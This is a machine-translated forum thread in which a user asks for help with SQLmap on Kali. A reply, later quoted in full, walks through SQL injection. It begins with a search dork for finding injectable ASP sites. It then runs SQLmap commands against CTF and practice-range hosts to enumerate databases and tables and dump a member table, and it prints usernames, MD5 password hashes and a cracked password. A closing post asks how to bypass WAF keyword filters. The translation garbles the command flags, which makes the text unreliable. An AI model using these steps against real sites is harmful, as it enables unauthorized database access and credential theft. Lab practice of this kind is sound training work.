Recently installed a kali Linux virtual machine, want to use inside a SQLmap software to do SQL injection, look, every trouble, had better give a source code

CodePudding user response:

SQLmap do SQL injection! River's lake emergency!!!!!!!!!!!!

CodePudding user response:

Search target sites: baidu: inurl: asp? Id==1
Sqlmap -u "url"
Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php? Id=1 "
Sqlmap -u "url" -- DBS
Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php? Id=1 "- DBS
Sqlmap -u databasename "url" - D - tables
Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php? Id=1 "- D my_db - tables
Sqlmap -u "url" dbname - T - D - the tablename - columns
Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php? Id=1 "- D my_db - T news - the cloumns
www.mozhe.cn into practice:
The view source: 219.153.49.228:48399=& gt; New_list. PHP? Id=1
Sqlmap -u http://219.153.49.228:48399/new_list.php? Id=1 - DBS (scan db)
The available database: information_scheme, mysql, performance_schema stormgroup, test;
Web: php5.6.39 mysql>=5.0.0
Sqlmap -u http://219.153.49.228:48399/new_list.php? Id=1 - D stormgroup - tables (detect all tables, multiple threads can be selected faster)
="member, notice
Sqlmap -u http://219.153.49.228:48399/new_list.php? Id=1 - D stormgroup - T member - dump (export data sheet content)
="name, password, status:
+ -- -- -- -- -- -- -- + + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- +
| name | status | password |
+ -- -- -- -- -- -- -- + + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- +
| | mozhe | 0 3114 b433dece9180717f2b7de56b28a3 |
| mozhe | 1 | b2408366889e147e847ddb81c7d0004d |
+ -- -- -- -- -- -- -- + + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- +
Md5crack mozhe 1:50 2550, input after landing, the key:

CodePudding user response:

Very detailed, thank you!!!!!

CodePudding user response:

refer to the second floor tailsgao response:

search target sites: baidu: inurl: asp? Id==1
Sqlmap -u "url"
Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php? Id=1 "
Sqlmap -u "url" -- DBS
Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php? Id=1 "- DBS
Sqlmap -u databasename "url" - D - tables
Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php? Id=1 "- D my_db - tables
Sqlmap -u "url" dbname - T - D - the tablename - columns
Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php? Id=1 "- D my_db - T news - the cloumns
www.mozhe.cn into practice:
The view source: 219.153.49.228:48399=& gt; New_list. PHP? Id=1
Sqlmap -u http://219.153.49.228:48399/new_list.php? Id=1 - DBS (scan db)
The available database: information_scheme, mysql, performance_schema stormgroup, test;
Web: php5.6.39 mysql>=5.0.0
Sqlmap -u http://219.153.49.228:48399/new_list.php? Id=1 - D stormgroup - tables (detect all tables, multiple threads can be selected faster)
="member, notice
Sqlmap -u http://219.153.49.228:48399/new_list.php? Id=1 - D stormgroup - T member - dump (export data sheet content)
="name, password, status:
+ -- -- -- -- -- -- -- + + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- +
| name | status | password |
+ -- -- -- -- -- -- -- + + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- +
| | mozhe | 0 3114 b433dece9180717f2b7de56b28a3 |
| mozhe | 1 | b2408366889e147e847ddb81c7d0004d |
+ -- -- -- -- -- -- -- + + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- +
Md5crack mozhe 1:50 2550, input after landing, the key:

But with SQLMAP SQL injection, how to bypass the CTF WAF protection in the topic, such as keyword bypass